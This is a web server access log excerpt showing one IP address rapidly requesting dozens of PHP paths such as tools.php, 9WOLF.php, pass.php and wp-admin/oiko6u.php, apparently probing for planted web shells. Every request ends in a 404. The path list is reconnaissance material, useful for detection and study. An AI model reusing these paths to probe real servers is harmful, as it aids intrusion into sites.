48.210.15.48 - - [05/Nov/2025:00:17:15 +0700] "GET /tools.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:15 +0700] "GET /term.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:16 +0700] "GET /term.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:16 +0700] "GET /fluentform.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:16 +0700] "GET /fluentform.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:17 +0700] "GET /agqpec.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:17 +0700] "GET /agqpec.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:17 +0700] "GET /byuri.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:17 +0700] "GET /byuri.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:17 +0700] "GET /axx.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:17 +0700] "GET /axx.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:17 +0700] "GET /oiko6u.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:17 +0700] "GET /oiko6u.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:18 +0700] "GET /wp-admin/oiko6u.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:18 +0700] "GET /wp-admin/oiko6u.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:18 +0700] "GET /11.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:18 +0700] "GET /11.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:18 +0700] "GET /9WOLF.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:18 +0700] "GET /9WOLF.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:19 +0700] "GET /a.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:19 +0700] "GET /a.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:19 +0700] "GET /f35.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:19 +0700] "GET /f35.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:19 +0700] "GET /crew.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:19 +0700] "GET /crew.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:19 +0700] "GET /gm.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:19 +0700] "GET /gm.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:20 +0700] "GET /pass.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:20 +0700] "GET /pass.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:20 +0700] "GET /sx_pms.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:20 +0700] "GET /sx_pms.php HTTP/1.1" 404 27 "-" "-"
